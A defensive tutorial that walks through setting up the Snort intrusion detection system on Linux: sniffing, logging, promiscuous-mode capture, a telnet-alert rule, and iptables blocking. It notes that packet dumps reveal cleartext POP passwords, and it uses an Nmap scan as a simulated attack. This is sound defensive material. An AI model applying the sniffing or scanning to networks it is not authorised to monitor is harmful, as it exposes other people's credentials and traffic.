Step 02

Set Up a ‘quiet’ network environment
When first setting up Snort, it helps to have as little activity on the network as possible. Disconnect other computers or even set up a VM with a bridged adaptor which you can operate upon from the host machine.

Step 03

Test Snort installation
Nearly all Snort operations need to be carried out by the root user. On Ubuntu, it’s probably worth using ‘sudo -i’ to avoid password prompts. Use ‘su’ on other distros. As root, type ‘snort -v’. This puts Snort into packet sniffer mode.

Step 04

Create network activity
Presuming that the network you are on is reasonably quiet, you can generate some network activity by pinging the server. Open another terminal and type ‘ping [IP address of server]’, and cancel after a couple of successful pings. Now, go back to the terminal with Snort running.

Step 05

Interpreting the data
In this example, the ping activity is reported in entries that end with lines ‘ECHO’ and ‘ECHO REPLY’. You may have to scroll back in the terminal to see these entries. Notice that the entries contain the time that the activity occurred and the source and destination of the traffic.

Step 06

Exiting Snort
Exit Snort by hitting Ctrl+C. When you exit Snort, it prints a statistical summary of the traffic that it observed. In this example, there should have been some ICMP traffic from the ping operation.

Step 07

More detail
Here’s a more extensive command line: ‘snort -vde’. This produces more output thanks to the d (dump the application-layer data) and e (display link-layer headers) flags. For example, if you fetch POP email without SSL enabled, you’ll be able to see the username and password scroll past.

Step 08

Log packet data
Make a directory called ‘snort_logs’. Now run ‘snort -d -l ./snort_logs’ and Snort will log all recorded traffic into the log directory, organised into a subdirectory per host IP address. We’ll skip the verbose flag (-v), as all of the screen output eats into Snort’s throughput.

Step 09

Back up Snort configuration file
Snort comes with a default configuration file which we will back up. Type ‘locate snort.conf’ to find the file and then make a copy of it. ‘cp /etc/snort/snort.conf /etc/snort/snort.conf_old’ should work for Ubuntu, for example.

Step 10

Initial configuration
Open the config file in a text editor. For now, make sure that the variable ‘HOME_NET’ accurately describes your network. For example, if your computers have IP addresses in the 192.168.0.x range, set it to 192.168.0.0/24.
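In snort.conf the setting looks like the following sketch (recent Snort releases use ‘ipvar’, older ones use ‘var’; the 192.168.0.0/24 network is just the example above):

```
# In /etc/snort/snort.conf -- define the network Snort treats as "home".
# Older Snort releases use "var" instead of "ipvar".
ipvar HOME_NET 192.168.0.0/24

# Everything that isn't HOME_NET is considered external:
ipvar EXTERNAL_NET !$HOME_NET
```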

Step 11

Create launch script
Make a startup script to save time. Create an empty file with ‘nano start_snort’, add the line ‘snort -de -l [full path to script]/snort_logs -c /etc/snort/snort.conf’ to it, and then save. Now type ‘chmod +x start_snort’. This will launch Snort in IDS mode, with reasonable defaults.
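The same script can be created non-interactively; a minimal sketch, with ‘/path/to/snort_logs’ standing in as a placeholder for your own full log path:

```shell
# Create the start_snort launch script without an editor.
# NOTE: /path/to/snort_logs is a placeholder -- substitute the full
# path to the log directory on your own system.
cat > start_snort << 'EOF'
#!/bin/sh
# Launch Snort in IDS mode: -d dumps application-layer data,
# -e shows link-layer headers, -l sets the log directory,
# -c points at the main configuration file.
snort -de -l /path/to/snort_logs -c /etc/snort/snort.conf
EOF

# Make it executable.
chmod +x start_snort
```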


Step 12

Intrusion detection mode
First, find the IP address of the machine running Snort by using ‘ifconfig’ and make a note of it. Now run ‘./start_snort’. Some extra startup information scrolls past as we are now using the Snort configuration file and the rules files that it references.

Step 13

Simulate an attack (Nmap)
We’ll begin by carrying out a port scan on the machine running Snort using Nmap, a common first step in a typical intrusion attempt. From a different machine on your network, type ‘nmap [IP address of Snort machine]’. A file called ‘alert’ should have appeared in the log folder. Examine it.

Step 14

Automatically start Snort
The method to launch a script at startup varies between distributions. On Ubuntu, simply add our ‘start_snort’ script to ‘/etc/init’ by typing ‘ln start_snort /etc/init/’. Remember to use fully qualified path names in the script.

Step 15

Protect the network
Protecting an entire network requires either a dedicated Snort machine or a dedicated network adaptor on your server. This is because the network card must be put into promiscuous mode to capture all traffic being transmitted, and this is the scenario we will work with here. Once you have installed the second card and rebooted the machine, determine the naming of the two network interfaces by typing ‘ifconfig’. In this example, the second network card is called ‘eth1’. Now open ‘/etc/network/interfaces’ in a text editor.

Step 16

Configure promiscuous mode
Add the following lines to the file: ‘iface eth1 inet manual’, ‘up ifconfig $IFACE 0.0.0.0 up’, ‘up ip link set $IFACE promisc on’, ‘down ip link set $IFACE promisc off’, ‘down ifconfig $IFACE down’. Type ‘sudo ifup eth1’ to start up the second Ethernet adaptor and physically plug it into your router, hub or spanning switch.
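Laid out as they should appear in the file (eth1 is the interface name from this example):

```
# /etc/network/interfaces -- bring eth1 up without an IP address and
# enable promiscuous mode so it sees all traffic on the segment.
iface eth1 inet manual
    up ifconfig $IFACE 0.0.0.0 up
    up ip link set $IFACE promisc on
    down ip link set $IFACE promisc off
    down ifconfig $IFACE down
```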

Step 17

Test promiscuous mode
Type ‘ifconfig’ and eth1 should be listed without an IP address. Now add ‘sudo ifup eth1’ to your Snort startup script along with the flag ‘-i eth1’ on the Snort launch command. When launched, Snort will now monitor all traffic on your network.

Step 18

Create a simple Snort rule
For the sake of simplicity, we are going to add a rule to the configuration file rather than create a new rule file. As root, open up snort.conf in a text editor. On the final line of the configuration file, add the following line: ‘alert tcp any any -> any 23 ( msg: “telnet alert!”; sid: 1; )’.
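Broken down, the parts of that rule are as follows (the sid value of 1 is simply a locally chosen ID; by convention, custom rules normally use sids of 1,000,000 or higher):

```
# action  proto  src IP  src port  ->  dst IP  dst port  (options)
#
# alert      : raise an alert when the rule matches
# tcp        : match TCP traffic only
# any any    : from any source IP, any source port
# -> any 23  : to any destination IP, on port 23 (telnet)
# msg        : the text recorded in the alert file
# sid        : a unique rule ID
alert tcp any any -> any 23 ( msg: "telnet alert!"; sid: 1; )
```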

Step 19

Test simple rule
Launch Snort with ‘snort -dev -l ./snort_logs -c /etc/snort/snort.conf’. From another machine, type ‘telnet [IP address of Snort machine]’. If everything has worked, you should now have an update in the alert file. See the Snort manual for a full breakdown, but open the file and check that the source IP and destination IP look correct.

Step 20

Fetch extra rules
Get extra rules from the Snort website (free sign-up required). They belong in ‘/etc/snort/rules’ and should be enabled using the ‘include’ directive in snort.conf. The comprehensive selection is an excellent starting point for creating your own rules for dealing with, for example, application-specific exploits.

Step 21

Add CSV output module
Unless you know that you are going to have to use Snort alert logs as input for another networking utility, consider switching it to CSV output so that you can view the data in a spreadsheet. Simply add the line ‘output alert_csv: alert.csv default’ to the end of the configuration file.
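For reference, the output line can also name an explicit field list rather than ‘default’; the field names below are taken from the Snort manual’s alert_csv documentation, so double-check them against your version:

```
# Log all fields:
output alert_csv: alert.csv default

# Or pick specific fields (names as listed in the Snort manual):
output alert_csv: alert.csv timestamp,msg,proto,src,srcport,dst,dstport
```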

Step 22

Interpreting an attack
When an attack is logged, begin by looking up the IP address with the ‘whois’ command or by using an online geographic IP lookup service. Note the port number of the attack to try to figure out the service or application that is the focus of the attack.
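If you’ve enabled the CSV output module from the earlier step, the alert log can be summarised straight from the shell. The file below is a hypothetical sample for illustration only, and the column layout (source IP in field 4) is an assumption — adjust the field number to match your own alert_csv field list:

```shell
# A hypothetical sample alert.csv, for illustration only
# (layout assumed: timestamp,msg,proto,src,srcport,dst,dstport):
cat > alert.csv << 'EOF'
04/24-10:01:02,telnet alert!,TCP,203.0.113.7,49152,192.168.0.10,23
04/24-10:01:05,telnet alert!,TCP,203.0.113.7,49153,192.168.0.10,23
04/24-10:02:11,telnet alert!,TCP,198.51.100.4,40000,192.168.0.10,23
EOF

# Count alerts per source IP (field 4), busiest first:
awk -F',' '{ count[$4]++ } END { for (ip in count) print count[ip], ip }' alert.csv | sort -rn
# prints (for the sample above):
#   2 203.0.113.7
#   1 198.51.100.4
```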

Step 23

Block an attack (part 1)
Block the IP address of the attacker as reported in the alert file. Obviously, the address can change, but addresses tend to be fairly static for the most common types of automated attack. Use the command ‘iptables -A INPUT -s [attacker IP address] -j DROP’.

Step 24

Block an attack (part 2)
It’s possible that an attack is targeting an unused or unimportant port on your network. Use ‘iptables -A INPUT -p tcp --destination-port 80 -j DROP’ to block a port, if you have determined that this will not harm the normal function of your system. To unblock a port or IP address, use the ‘-D’ switch instead of ‘-A’.